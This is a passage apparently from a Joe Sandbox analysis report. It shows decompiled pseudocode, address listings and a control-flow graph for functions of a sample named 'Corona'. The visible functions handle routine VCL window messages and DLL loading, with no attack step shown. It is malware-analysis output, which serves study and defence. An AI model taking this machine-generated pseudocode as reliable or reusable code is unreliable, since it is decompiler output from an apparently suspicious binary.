						_t239 = _t227 + 0xffffffe0 - 7;
						__eflags = _t239;
						if(_t239 < 0) {
							 *(_v12 + 0xc) = SendMessageA( *(_v12 + 8), _t308 + 0xbc00,  *(_v12 + 4),  *(_v12 + 8));
							goto L102;
						}
						__eflags = _t239 == 0x1e1;
						if(_t239 == 0x1e1) {
							_t247 = E004280CC(E00427FEC());
							__eflags = _t247;
							if(_t247 != 0) {
								E00428128(E00427FEC());
							}
							goto L102;
						} else {
							goto L101;
						}
					}
					if(__eflags == 0) {
						goto L89;
					}
					__eflags = _t161 - 0x16;
					if(__eflags > 0) {
						__eflags = _t161 - 0x1d;
						if(__eflags > 0) {
							_t250 = _t161 - 0x37;
							__eflags = _t250;
							if(_t250 == 0) {
								 *(_v12 + 0xc) = E0044D634(_v8);
								goto L102;
							}
							__eflags = _t250 == 0x13;
							if(_t250 == 0x13) {
								_t254 = _v12;
								__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) - 0xde534454;
								if( *((intOrPtr*)( *((intOrPtr*)(_t254 + 8)))) == 0xde534454) {
									_t256 = _v8;
									__eflags =  *((char*)(_t256 + 0x9e));
									if( *((char*)(_t256 + 0x9e)) != 0) {
										_t257 = _v8;
										__eflags =  *(_t257 + 0xa0);
										if( *(_t257 + 0xa0) != 0) {
											 *(_v12 + 0xc) = 0;
										} else {
											_t314 = E0040CBF0("vcltest3.dll", _t308, 0x8000);
											 *(_v8 + 0xa0) = _t314;
											__eflags = _t314;
											if(_t314 == 0) {
												 *(_v12 + 0xc) = GetLastError();
												 *(_v8 + 0xa0) = 0;
											} else {
												 *(_v12 + 0xc) = 0;
												_t375 = GetProcAddress( *(_v8 + 0xa0), "RegisterAutomation");
												_t315 = _t375;
												__eflags = _t375;
												if(_t375 != 0) {
													_t269 =  *(_v12 + 8);
													_t315->i( *((intOrPtr*)(_t269 + 4)),  *((intOrPtr*)(_t269 + 8)));
												}
											}
										}
									}
								}
								goto L102;
							} else {
								goto L101;
							}
						}
						if(__eflags == 0) {
							_t272 =  *0x452bb4; // 0x2131320
							E0044C3E8(_t272);
							E0044CEA8(_t377);
							goto L102;
						}
						_t275 = _t161 - 0x1a;
						__eflags = _t275;
						if(_t275 == 0) {
							_t276 =  *0x4510d4; // 0x452b10
							E004396D0( *_t276, _t317,  *(_v12 + 4));
							E0044CE3C(_v8, _t308, _t317, _v12, _t370);
							E0044CEA8(_t377);
							goto L102;
						}
						__eflags = _t275 == 2;
						if(_t275 == 2) {
							E0044CEA8(_t377);
							_t284 = _v12;
							__eflags =  *((intOrPtr*)(_t284 + 4)) - 1;
							asm("sbb eax, eax");
							 *((char*)(_v8 + 0x9d)) = _t284 + 1;
							_t286 = _v12;
							__eflags =  *(_t286 + 4);
							if( *(_t286 + 4) == 0) {
								E0044CD38();
								PostMessageA( *(_v8 + 0x30), 0xb001, 0, 0); // executed
							} else {
								E0044CD48(_v8);
								PostMessageA( *(_v8 + 0x30), 0xb000, 0, 0); // executed
							}
							goto L102;
						} else {
							goto L101;
						}
					}
					if(__eflags == 0) {
						_t297 = _v12;
						__eflags =  *(_t297 + 4);
						if( *(_t297 + 4) != 0) {
							 *((char*)(_v8 + 0x9c)) = 1;
						}
						goto L102;
					}
					__eflags = _t161 - 0x14;
					if(_t161 > 0x14) {
						goto L101;
					}
					switch( *((intOrPtr*)(_t161 * 4 +  &M0044CFD4))) {
						case 0:
							0 = E00418EF8(0, __ebx, __edi, __esi);
							goto L102;
						case 1:
							goto L101;
						case 2:
							_push(0);
							_push(0);
							_push(0xb01a);
							_v8 =  *(_v8 + 0x30);
							_push( *(_v8 + 0x30));
							L00406584();
							__eax = E0044CEA8(__ebp);
							goto L102;
						case 3:
							__eax = _v12;
							__eflags =  *(__eax + 4);
							if( *(__eax + 4) == 0) {
								__eax = E0044CEA8(__ebp);
								__eax = _v8;
								__eflags =  *(__eax + 0xac);
								if( *(__eax + 0xac) == 0) {
									__eax = _v8;
									__eax =  *(_v8 + 0x30);
									__eax = E00444C18( *(_v8 + 0x30), __ebx, __edi, __esi);
									__edx = _v8;
									 *(_v8 + 0xac) = __eax;
								}
								_v8 = L0044CD40();
							} else {
								_v8 = E0044CD48(_v8);
								__eax = _v8;
								__eax =  *(_v8 + 0xac);
								__eflags = __eax;
								if(__eax != 0) {
									__eax = _v8;
									__edx = 0;
									__eflags = 0;
									 *(_v8 + 0xac) = 0;
								}
								__eax = E0044CEA8(__ebp);
							}
							goto L102;
						case 4:
							__eax = _v8;
							__eax =  *(_v8 + 0x30);
							_push(__eax);
							L004064F4();
							__eflags = __eax;
							if(__eax == 0) {
								__eax = E0044CEA8(__ebp);
							} else {
								__eax = E0044CEE4(__ebp);
							}
							goto L102;
						case 5:
							__eax = _v8;
							__eax =  *(_v8 + 0x44);
							__eflags = __eax;
							if(__eax != 0) {
								__eax = E0044A5E8(__eax, __ecx);
							}
							goto L102;
						case 6:
							__eax = _v12;
							 *_v12 = 0x27;
							__eax = E0044CEA8(__ebp);
							goto L102;
					}
				} else {
					_t316 = _t306 + 1;
					_t376 = 0;
					L2:
					L2:
					if( *((intOrPtr*)(E004136F8( *((intOrPtr*)(_v8 + 0xa8)), _t376)))() == 0) {
						goto L4;
					} else {
						_t166 = 0;
						_pop(_t366);
						 *[fs:eax] = _t366;
					}
					L103:
					return _t166;
					L4:
					_t376 = _t376 + 1;
					_t316 = _t316 - 1;
					__eflags = _t316;
					if(_t316 != 0) {
						goto L2;
					}
					goto L5;
				}
			}























































                                  0x0044cf30
                                  0x0044cf37
                                  0x0044cf39
                                  0x0044cf3c
                                  0x0044cf41
                                  0x0044cf42
                                  0x0044cf47
                                  0x0044cf4a
                                  0x0044cf52
                                  0x0044cf61
                                  0x0044cf64
                                  0x0044cf98
                                  0x0044cf9e
                                  0x0044cfa6
                                  0x0044cfa8
                                  0x0044cfaa
                                  0x0044cfad
                                  0x0044d061
                                  0x0044d066
                                  0x0044d0b7
                                  0x0044d0bc
                                  0x0044d0dd
                                  0x0044d0dd
                                  0x0044d0e2
                                  0x0044d552
                                  0x0044d555
                                  0x0044d559
                                  0x0044d575
                                  0x0044d55b
                                  0x0044d567
                                  0x0044d567
                                  0x0044d5e0
                                  0x0044d5e0
                                  0x0044d5e2
                                  0x0044d5e5
                                  0x00000000
                                  0x0044d5e5
                                  0x0044d0eb
                                  0x0044d0ee
                                  0x0044d3ad
                                  0x0044d0f4
                                  0x0044d5d9
                                  0x0044d5da
                                  0x0044d5df
                                  0x00000000
                                  0x0044d0ee
                                  0x0044d0be
                                  0x0044d519
                                  0x0044d51c
                                  0x0044d520
                                  0x0044d548
                                  0x0044d522
                                  0x0044d530
                                  0x0044d530
                                  0x00000000
                                  0x0044d520
                                  0x0044d0c4
                                  0x0044d0c4
                                  0x0044d0c9
                                  0x0044d4c7
                                  0x0044d4cc
                                  0x0044d4ce
                                  0x0044d4d4
                                  0x0044d4d9
                                  0x0044d4dc
                                  0x0044d4df
                                  0x0044d4e7
                                  0x0044d4ec
                                  0x0044d4ee
                                  0x0044d4f5
                                  0x0044d4f5
                                  0x0044d4ee
                                  0x0044d4df
                                  0x00000000
                                  0x0044d4ce
                                  0x0044d0cf
                                  0x0044d0d2
                                  0x0044d4ff
                                  0x0044d50f
                                  0x00000000
                                  0x0044d0d8
                                  0x00000000
                                  0x0044d0d8
                                  0x0044d0d2
                                  0x0044d068
                                  0x0044d3da
                                  0x0044d3dd
                                  0x0044d3df
                                  0x0044d3e5
                                  0x0044d3e9
                                  0x0044d3ee
                                  0x0044d3f0
                                  0x0044d3fe
                                  0x0044d403
                                  0x0044d405
                                  0x0044d413
                                  0x0044d418
                                  0x0044d41a
                                  0x0044d420
                                  0x0044d427
                                  0x0044d436
                                  0x0044d44f
                                  0x0044d455
                                  0x0044d45a
                                  0x0044d464
                                  0x0044d464
                                  0x0044d41a
                                  0x0044d405
                                  0x0044d3f0
                                  0x00000000
                                  0x0044d3df
                                  0x0044d06e
                                  0x0044d073
                                  0x0044d09e
                                  0x0044d09e
                                  0x0044d0a3
                                  0x0044d498
                                  0x0044d49b
                                  0x0044d4a3
                                  0x0044d4b5
                                  0x0044d4b5
                                  0x00000000
                                  0x0044d4a3
                                  0x0044d0a9
                                  0x0044d0ac
                                  0x0044d3bb
                                  0x0044d3c0
                                  0x0044d3c2
                                  0x0044d3cb
                                  0x0044d3cb
                                  0x00000000
                                  0x0044d0b2
                                  0x00000000
                                  0x0044d0b2
                                  0x0044d0ac
                                  0x0044d075
                                  0x0044d470
                                  0x0044d473
                                  0x0044d47b
                                  0x0044d48d
                                  0x0044d48d
                                  0x00000000
                                  0x0044d47b
                                  0x0044d07b
                                  0x0044d07b
                                  0x0044d080
                                  0x0044d104
                                  0x0044d104
                                  0x0044d109
                                  0x0044d117
                                  0x0044d10b
                                  0x0044d10b
                                  0x0044d110
                                  0x0044d124
                                  0x0044d112
                                  0x0044d12f
                                  0x0044d134
                                  0x0044d110
                                  0x00000000
                                  0x0044d109
                                  0x0044d085
                                  0x0044d085
                                  0x0044d088
                                  0x0044d2bc
                                  0x00000000
                                  0x0044d2bc
                                  0x0044d08e
                                  0x0044d093
                                  0x0044d5bb
                                  0x0044d5c0
                                  0x0044d5c2
                                  0x0044d5c9
                                  0x0044d5c9
                                  0x00000000
                                  0x0044d099
                                  0x00000000
                                  0x0044d099
                                  0x0044d093
                                  0x0044cfb3
                                  0x00000000
                                  0x00000000
                                  0x0044cfb9
                                  0x0044cfbc
                                  0x0044d028
                                  0x0044d02b
                                  0x0044d04a
                                  0x0044d04a
                                  0x0044d04d
                                  0x0044d19a
                                  0x00000000
                                  0x0044d19a
                                  0x0044d053
                                  0x0044d056
                                  0x0044d2e0
                                  0x0044d2e6
                                  0x0044d2ec
                                  0x0044d2f2
                                  0x0044d2f5
                                  0x0044d2fc
                                  0x0044d302
                                  0x0044d305
                                  0x0044d30c
                                  0x0044d38c
                                  0x0044d30e
                                  0x0044d31d
                                  0x0044d322
                                  0x0044d328
                                  0x0044d32a
                                  0x0044d374
                                  0x0044d37c
                                  0x0044d32c
                                  0x0044d331
                                  0x0044d348
                                  0x0044d34a
                                  0x0044d34c
                                  0x0044d34e
                                  0x0044d357
                                  0x0044d365
                                  0x0044d365
                                  0x0044d34e
                                  0x0044d32a
                                  0x0044d30c
                                  0x0044d2fc
                                  0x00000000
                                  0x0044d05c
                                  0x00000000
                                  0x0044d05c
                                  0x0044d056
                                  0x0044d02d
                                  0x0044d5a3
                                  0x0044d5a8
                                  0x0044d5ae
                                  0x00000000
                                  0x0044d5b3
                                  0x0044d033
                                  0x0044d033
                                  0x0044d036
                                  0x0044d583
                                  0x0044d58a
                                  0x0044d595
                                  0x0044d59b
                                  0x00000000
                                  0x0044d5a0
                                  0x0044d03c
                                  0x0044d03f
                                  0x0044d1c4
                                  0x0044d1ca
                                  0x0044d1cd
                                  0x0044d1d1
                                  0x0044d1d7
                                  0x0044d1dd
                                  0x0044d1e0
                                  0x0044d1e4
                                  0x0044d20b
                                  0x0044d220
                                  0x0044d1e6
                                  0x0044d1e9
                                  0x0044d1fe
                                  0x0044d1fe
                                  0x00000000
                                  0x0044d045
                                  0x00000000
                                  0x0044d045
                                  0x0044d03f
                                  0x0044cfbe
                                  0x0044d2c4
                                  0x0044d2c7
                                  0x0044d2cb
                                  0x0044d2d4
                                  0x0044d2d4
                                  0x00000000
                                  0x0044d2cb
                                  0x0044cfc4
                                  0x0044cfc7
                                  0x00000000
                                  0x00000000
                                  0x0044cfcd
                                  0x00000000
                                  0x0044d5d2
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044d1a2
                                  0x0044d1a4
                                  0x0044d1a6
                                  0x0044d1ae
                                  0x0044d1b1
                                  0x0044d1b2
                                  0x0044d1b8
                                  0x00000000
                                  0x00000000
                                  0x0044d22a
                                  0x0044d22d
                                  0x0044d231
                                  0x0044d265
                                  0x0044d26b
                                  0x0044d26e
                                  0x0044d275
                                  0x0044d277
                                  0x0044d27a
                                  0x0044d27d
                                  0x0044d282
                                  0x0044d285
                                  0x0044d285
                                  0x0044d28e
                                  0x0044d233
                                  0x0044d236
                                  0x0044d23b
                                  0x0044d23e
                                  0x0044d244
                                  0x0044d246
                                  0x0044d24d
                                  0x0044d250
                                  0x0044d250
                                  0x0044d252
                                  0x0044d252
                                  0x0044d259
                                  0x0044d25e
                                  0x00000000
                                  0x00000000
                                  0x0044d152
                                  0x0044d155
                                  0x0044d158
                                  0x0044d159
                                  0x0044d15e
                                  0x0044d160
                                  0x0044d16f
                                  0x0044d162
                                  0x0044d163
                                  0x0044d168
                                  0x00000000
                                  0x00000000
                                  0x0044d13a
                                  0x0044d13d
                                  0x0044d140
                                  0x0044d142
                                  0x0044d148
                                  0x0044d148
                                  0x00000000
                                  0x00000000
                                  0x0044d17a
                                  0x0044d17d
                                  0x0044d184
                                  0x00000000
                                  0x00000000
                                  0x0044cf66
                                  0x0044cf66
                                  0x0044cf67
                                  0x00000000
                                  0x0044cf69
                                  0x0044cf85
                                  0x00000000
                                  0x0044cf87
                                  0x0044cf87
                                  0x0044cf89
                                  0x0044cf8c
                                  0x0044cf8c
                                  0x0044d5ff
                                  0x0044d605
                                  0x0044cf94
                                  0x0044cf94
                                  0x0044cf95
                                  0x0044cf95
                                  0x0044cf96
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0044cf96

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.791887311.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.791871825.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792188953.0000000000450000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792195911.0000000000451000.00000008.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792214701.0000000000452000.00000004.00020000.sdmp Download File
                                  • Associated: 0000000C.00000002.792234083.0000000000458000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Corona.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RegisterAutomation$vcltest3.dll
                                  • API String ID: 0-2963190186
                                  • Opcode ID: de8533cb725012e3b7f7eb27e251274df388a2656fc306ef6d01a75b3f260b7b
                                  • Instruction ID: 06d206e28d9f37d570c1c27d042845d046e04eaf87a1697171c6dcb53e674dc3
                                  • Opcode Fuzzy Hash: de8533cb725012e3b7f7eb27e251274df388a2656fc306ef6d01a75b3f260b7b
                                  • Instruction Fuzzy Hash: 18E15E35B00204EFFB10EB69C585A9EB7F1AF08318F2581A6E405DB752DB38EE41DB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00449F58, Relevance: 23.2, APIs: 12, Strings: 1, Instructions: 407windowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 180 449f58-449f7e 181 449f80-449f8a 180->181 182 449fad-449fd6 call 44e66c 180->182 181->182 183 449f8c-449fa8 call 40597c call 40b1b8 call 403888 181->183 188 449fdc-449fe6 182->188 189 44a48d-44a4a4 182->189 183->182 191 449fec-44a031 call 4032f8 188->191 192 44a388-44a3ce call 4032f8 188->192 203 44a053-44a05d 191->203 204 44a033-44a03d 191->204 201 44a3d0-44a3d5 call 449104 192->201 202 44a3da-44a3e4 192->202 201->202 208 44a3e6-44a3ee call 43244c 202->208 209 44a3f3-44a3fd 202->209 205 44a097-44a0ab call 44b7f0 203->205 206 44a05f-44a076 call 42e1f8 203->206 210 44a043-44a04d 204->210 211 44a10a-44a11b 204->211 237 44a0b0-44a0c2 call 44b7e4 205->237 238 44a0ad 205->238 233 44a078 206->233 234 44a07b-44a090 call 42e23c 206->234 208->189 217 44a41e-44a431 call 434ef4 GetActiveWindow 209->217 218 44a3ff-44a41c call 434ef4 SetWindowPos 209->218 210->203 210->211 215 44a121-44a133 211->215 216 44a1ef-44a1f1 211->216 225 44a135-44a148 call 403288 215->225 226 44a150-44a152 215->226 221 44a294-44a2a8 216->221 222 44a1f7-44a201 216->222 241 44a454-44a456 217->241 242 44a433-44a443 call 434ef4 IsIconic 217->242 218->189 229 44a363-44a383 call 434ef4 ShowWindow 221->229 230 44a2ae-44a2b8 221->230 235 44a203-44a21a call 42e1f8 222->235 236 44a23b-44a24f call 44b820 222->236 225->226 260 44a14a-44a14d 225->260 231 44a154-44a15f 226->231 232 44a17c-44a190 call 44b7f0 226->232 229->189 243 44a2f0-44a33c call 434ef4 ShowWindow call 434ef4 CallWindowProcA call 42ea44 230->243 244 44a2ba-44a2ee call 434ef4 SendMessageA call 434ef4 ShowWindow 230->244 248 44a164-44a172 231->248 249 44a161 231->249 281 44a195-44a1a7 call 44b7e4 232->281 282 44a192 232->282 233->234 269 44a0c7-44a0c9 234->269 280 44a092-44a095 234->280 274 44a21c 235->274 275 44a21f-44a234 call 42e23c 235->275 277 44a254-44a266 call 44b814 236->277 278 44a251 236->278 268 44a0c4 237->268 237->269 238->237 257 44a47d-44a488 call 434ef4 ShowWindow 241->257 258 44a458-44a47b call 434ef4 SetWindowPos SetActiveWindow 241->258 242->241 287 44a445-44a452 call 434ef4 call 444d68 242->287 306 44a341-44a35e SendMessageA 243->306 244->306 262 44a174 248->262 263 44a177-44a17a 248->263 249->248 257->189 258->189 260->226 262->263 279 44a1ac-44a1ae 263->279 268->269 285 44a0cd-44a0cf 269->285 286 44a0cb 269->286 274->275 308 44a236-44a239 275->308 309 44a26b-44a26d 275->309 277->309 310 44a268 277->310 278->277 283 44a1b0 279->283 284 44a1b2-44a1b4 279->284 280->269 281->279 311 44a1a9 281->311 282->281 283->284 295 44a1b6 284->295 296 44a1b8-44a1dc 284->296 297 44a0d1 285->297 298 44a0d3-44a0f7 285->298 286->285 287->241 295->296 296->221 317 44a1e2-44a1ea call 4483b4 296->317 297->298 298->221 318 44a0fd-44a105 call 4483b4 298->318 306->189 308->309 315 44a271-44a273 309->315 316 44a26f 309->316 310->309 311->279 320 44a275 315->320 321 44a277-44a28c 315->321 316->315 317->221 318->221 320->321 321->221
                                  C-Code - Quality: 83%
                                  			E00449F58(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				intOrPtr _t149;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t160;
				intOrPtr _t162;
				intOrPtr _t163;
				void* _t165;
				struct HWND__* _t166;
				long _t176;
				signed int _t198;
				signed int _t199;
				long _t220;
				intOrPtr _t226;
				int _t231;
				intOrPtr _t232;
				intOrPtr _t241;
				intOrPtr _t245;
				signed int _t248;
				intOrPtr _t251;
				intOrPtr _t252;
				signed int _t258;
				long _t259;
				intOrPtr _t262;
				intOrPtr _t266;
				signed int _t269;
				intOrPtr _t270;
				intOrPtr _t271;
				signed int _t277;
				long _t278;
				intOrPtr _t281;
				signed int _t286;
				signed int _t287;
				long _t290;
				intOrPtr _t294;
				struct HWND__* _t299;
				signed int _t301;
				signed int _t302;
				signed int _t305;
				signed int _t307;
				long _t308;
				signed int _t311;
				signed int _t313;
				long _t314;
				signed int _t317;
				signed int _t318;
				signed int _t326;
				long _t328;
				intOrPtr _t331;
				intOrPtr _t362;
				long _t370;
				void* _t372;
				void* _t373;
				intOrPtr _t374;

				_t372 = _t373;
				_t374 = _t373 + 0xfffffff8;
				_v12 = 0;
				_v8 = __eax;
				_push(_t372);
				_push(0x44a4c2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2f4) & 0x00000004) != 0) {
					_t294 =  *0x451118; // 0x41a48c
					E0040597C(_t294,  &_v12);
					E0040B1B8(_v12, 1);
					E00403888();
				}
				_t149 =  *0x452bb0; // 0x2131714, executed
				E0044E66C(_t149); // executed
				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000004;
				_push(_t372);
				_push(0x44a4a5);
				_push( *[fs:edx]);
				 *[fs:edx] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
					_t155 = _v8;
					_t378 =  *((char*)(_t155 + 0x1a6));
					if( *((char*)(_t155 + 0x1a6)) == 0) {
						_push(_t372);
						_push(0x44a3ac);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E004032F8(_v8, __eflags);
						 *[fs:eax] = 0;
						_t160 =  *0x452bb4; // 0x2131320
						__eflags =  *((intOrPtr*)(_t160 + 0x6c)) - _v8;
						if( *((intOrPtr*)(_t160 + 0x6c)) == _v8) {
							__eflags = 0;
							E00449104(_v8, 0);
						}
						_t162 = _v8;
						__eflags =  *((char*)(_t162 + 0x22f)) - 1;
						if( *((char*)(_t162 + 0x22f)) != 1) {
							_t163 = _v8;
							__eflags =  *(_t163 + 0x2f4) & 0x00000008;
							if(( *(_t163 + 0x2f4) & 0x00000008) == 0) {
								_t299 = 0;
								_t165 = E00434EF4(_v8);
								_t166 = GetActiveWindow();
								__eflags = _t165 - _t166;
								if(_t165 == _t166) {
									_t176 = IsIconic(E00434EF4(_v8));
									__eflags = _t176;
									if(_t176 == 0) {
										_t299 = E00444D68(E00434EF4(_v8));
									}
								}
								__eflags = _t299;
								if(_t299 == 0) {
									ShowWindow(E00434EF4(_v8), 0);
								} else {
									SetWindowPos(E00434EF4(_v8), 0, 0, 0, 0, 0, 0x97);
									SetActiveWindow(_t299);
								}
							} else {
								SetWindowPos(E00434EF4(_v8), 0, 0, 0, 0, 0, 0x97);
							}
						} else {
							E0043244C(_v8);
						}
					} else {
						_push(_t372);
						_push(0x44a010);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E004032F8(_v8, _t378);
						 *[fs:eax] = 0;
						if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {
							if( *((char*)(_v8 + 0x22f)) != 1) {
								_t301 = E0044B7F0() -  *(_v8 + 0x48);
								__eflags = _t301;
								_t302 = _t301 >> 1;
								if(_t301 < 0) {
									asm("adc ebx, 0x0");
								}
								_t198 = E0044B7E4() -  *(_v8 + 0x4c);
								__eflags = _t198;
								_t199 = _t198 >> 1;
								if(_t198 < 0) {
									asm("adc eax, 0x0");
								}
							} else {
								_t241 =  *0x452bb0; // 0x2131714
								_t305 = E0042E1F8( *((intOrPtr*)(_t241 + 0x44))) -  *(_v8 + 0x48);
								_t302 = _t305 >> 1;
								if(_t305 < 0) {
									asm("adc ebx, 0x0");
								}
								_t245 =  *0x452bb0; // 0x2131714
								_t248 = E0042E23C( *((intOrPtr*)(_t245 + 0x44))) -  *(_v8 + 0x4c);
								_t199 = _t248 >> 1;
								if(_t248 < 0) {
									asm("adc eax, 0x0");
								}
							}
							if(_t302 < 0) {
								_t302 = 0;
							}
							if(_t199 < 0) {
								_t199 = 0;
							}
							_t326 = _t199;
							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
							if( *((char*)(_v8 + 0x57)) != 0) {
								E004483B4(_v8, _t326);
							}
						} else {
							_t251 =  *((intOrPtr*)(_v8 + 0x230));
							__eflags = _t251 + 0xfa - 2;
							if(_t251 + 0xfa - 2 >= 0) {
								__eflags = _t251 - 5;
								if(_t251 == 5) {
									_t252 = _v8;
									__eflags =  *((char*)(_t252 + 0x22f)) - 1;
									if( *((char*)(_t252 + 0x22f)) != 1) {
										_t307 = E0044B820() -  *(_v8 + 0x48);
										__eflags = _t307;
										_t308 = _t307 >> 1;
										if(_t307 < 0) {
											asm("adc ebx, 0x0");
										}
										_t258 = E0044B814() -  *(_v8 + 0x4c);
										__eflags = _t258;
										_t259 = _t258 >> 1;
										if(_t258 < 0) {
											asm("adc eax, 0x0");
										}
									} else {
										_t262 =  *0x452bb0; // 0x2131714
										_t311 = E0042E1F8( *((intOrPtr*)(_t262 + 0x44))) -  *(_v8 + 0x48);
										__eflags = _t311;
										_t308 = _t311 >> 1;
										if(_t311 < 0) {
											asm("adc ebx, 0x0");
										}
										_t266 =  *0x452bb0; // 0x2131714
										_t269 = E0042E23C( *((intOrPtr*)(_t266 + 0x44))) -  *(_v8 + 0x4c);
										__eflags = _t269;
										_t259 = _t269 >> 1;
										if(_t269 < 0) {
											asm("adc eax, 0x0");
										}
									}
									__eflags = _t308;
									if(_t308 < 0) {
										_t308 = 0;
										__eflags = 0;
									}
									__eflags = _t259;
									if(_t259 < 0) {
										_t259 = 0;
										__eflags = 0;
									}
									 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								}
							} else {
								_t270 =  *0x452bb0; // 0x2131714
								_t370 =  *(_t270 + 0x44);
								_t271 = _v8;
								__eflags =  *((char*)(_t271 + 0x230)) - 7;
								if( *((char*)(_t271 + 0x230)) == 7) {
									_t362 =  *0x4436a0; // 0x4436ec
									_t290 = E00403288( *(_v8 + 4), _t362);
									__eflags = _t290;
									if(_t290 != 0) {
										_t370 =  *(_v8 + 4);
									}
								}
								__eflags = _t370;
								if(_t370 == 0) {
									_t313 = E0044B7F0() -  *(_v8 + 0x48);
									__eflags = _t313;
									_t314 = _t313 >> 1;
									if(_t313 < 0) {
										asm("adc ebx, 0x0");
									}
									_t277 = E0044B7E4() -  *(_v8 + 0x4c);
									__eflags = _t277;
									_t278 = _t277 >> 1;
									if(_t277 < 0) {
										asm("adc eax, 0x0");
									}
								} else {
									_t317 =  *((intOrPtr*)(_t370 + 0x48)) -  *(_v8 + 0x48);
									__eflags = _t317;
									_t318 = _t317 >> 1;
									if(_t317 < 0) {
										asm("adc ebx, 0x0");
									}
									_t314 = _t318 +  *((intOrPtr*)(_t370 + 0x40));
									_t286 =  *((intOrPtr*)(_t370 + 0x4c)) -  *(_v8 + 0x4c);
									__eflags = _t286;
									_t287 = _t286 >> 1;
									if(_t286 < 0) {
										asm("adc eax, 0x0");
									}
									_t278 = _t287 +  *((intOrPtr*)(_t370 + 0x44));
								}
								__eflags = _t314;
								if(_t314 < 0) {
									_t314 = 0;
									__eflags = 0;
								}
								__eflags = _t278;
								if(_t278 < 0) {
									_t278 = 0;
									__eflags = 0;
								}
								_t328 = _t278;
								 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								_t281 = _v8;
								__eflags =  *((char*)(_t281 + 0x57));
								if( *((char*)(_t281 + 0x57)) != 0) {
									E004483B4(_v8, _t328);
								}
							}
						}
						 *((char*)(_v8 + 0x230)) = 0;
						if( *((char*)(_v8 + 0x22f)) != 1) {
							ShowWindow(E00434EF4(_v8),  *(0x450c94 + ( *(_v8 + 0x22b) & 0x000000ff) * 4)); // executed
						} else {
							if( *(_v8 + 0x22b) != 2) {
								ShowWindow(E00434EF4(_v8),  *(0x450c94 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
								_t220 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
								__eflags = _t220;
								CallWindowProcA(0x40628c, E00434EF4(_v8), 5, 0, _t220);
								E0042EA44();
							} else {
								_t231 = E00434EF4(_v8);
								_t232 =  *0x452bb0; // 0x2131714
								SendMessageA( *( *((intOrPtr*)(_t232 + 0x44)) + 0x254), 0x223, _t231, 0);
								ShowWindow(E00434EF4(_v8), 3);
							}
							_t226 =  *0x452bb0; // 0x2131714
							SendMessageA( *( *((intOrPtr*)(_t226 + 0x44)) + 0x254), 0x234, 0, 0);
						}
					}
				}
				_pop(_t331);
				 *[fs:eax] = _t331;
				_push(0x44a4ac);
				_t154 = _v8;
				 *(_t154 + 0x2f4) =  *(_t154 + 0x2f4) & 0x000000fb;
				return _t154;
			}


























































                                  0x00449f59
                                  0x00449f5b
                                  0x00449f63
                                  0x00449f66
                                  0x00449f6b
                                  0x00449f6c
                                  0x00449f71
                                  0x00449f74
                                  0x00449f7e
                                  0x00449f8f
                                  0x00449f94
                                  0x00449fa3
                                  0x00449fa8
                                  0x00449fa8
                                  0x00449fad
                                  0x00449fb2
                                  0x00449fba
                                  0x00449fc3
                                  0x00449fc4
                                  0x00449fc9
                                  0x00449fcc
                                  0x00449fd6
                                  0x00449fdc
                                  0x00449fdf
                                  0x00449fe6
                                  0x0044a38a
                                  0x0044a38b
                                  0x0044a390
                                  0x0044a393
                                  0x0044a39d
                                  0x0044a3a7
                                  0x0044a3c3
                                  0x0044a3cb
                                  0x0044a3ce
                                  0x0044a3d0
                                  0x0044a3d5
                                  0x0044a3d5
                                  0x0044a3da
                                  0x0044a3dd
                                  0x0044a3e4
                                  0x0044a3f3
                                  0x0044a3f6
                                  0x0044a3fd
                                  0x0044a41e
                                  0x0044a423
                                  0x0044a42a
                                  0x0044a42f
                                  0x0044a431
                                  0x0044a43c
                                  0x0044a441
                                  0x0044a443
                                  0x0044a452
                                  0x0044a452
                                  0x0044a443
                                  0x0044a454
                                  0x0044a456
                                  0x0044a488
                                  0x0044a458
                                  0x0044a470
                                  0x0044a476
                                  0x0044a476
                                  0x0044a3ff
                                  0x0044a417
                                  0x0044a417
                                  0x0044a3e6
                                  0x0044a3e9
                                  0x0044a3e9
                                  0x00449fec
                                  0x00449fee
                                  0x00449fef
                                  0x00449ff4
                                  0x00449ff7
                                  0x0044a001
                                  0x0044a00b
                                  0x0044a031
                                  0x0044a05d
                                  0x0044a0a6
                                  0x0044a0a6
                                  0x0044a0a9
                                  0x0044a0ab
                                  0x0044a0ad
                                  0x0044a0ad
                                  0x0044a0bd
                                  0x0044a0bd
                                  0x0044a0c0
                                  0x0044a0c2
                                  0x0044a0c4
                                  0x0044a0c4
                                  0x0044a05f
                                  0x0044a05f
                                  0x0044a071
                                  0x0044a074
                                  0x0044a076
